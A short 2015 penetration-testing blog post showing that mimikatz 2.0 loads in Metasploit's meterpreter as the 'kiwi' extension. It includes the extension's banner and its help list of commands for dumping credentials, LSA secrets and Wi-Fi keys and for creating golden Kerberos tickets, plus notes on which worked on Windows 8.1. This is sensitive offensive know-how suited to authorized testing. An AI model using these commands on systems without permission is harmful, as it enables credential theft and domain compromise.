Tuesday, February 10, 2015

MSF's + Mimikatz + Windows 8.1 part two


I love twitter. OJ replied to me about my metasploit+mimikatz+Windows 8.1 post


Looks like mimikatz 2.0 IS in msf, its just under the use kiwi functionality

meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.0 alpha (x64/win64) release "Kiwi en C"
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.

meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials
    creds_kerberos         Retrieve Kerberos creds
    creds_livessp          Retrieve LiveSSP creds
    creds_msv              Retrieve LM/NTLM creds (hashes)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds
    creds_wdigest          Retrieve WDigest creds
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    lsa_dump               Dump LSA secrets
    wifi_list              List wifi profiles/creds

I wasn't able to get the hashes with any of the creds_* modules but lsa_dump and kerberos functionality seemed to be working like it should.

HTH for future pentests.

-CG


CG

No comments: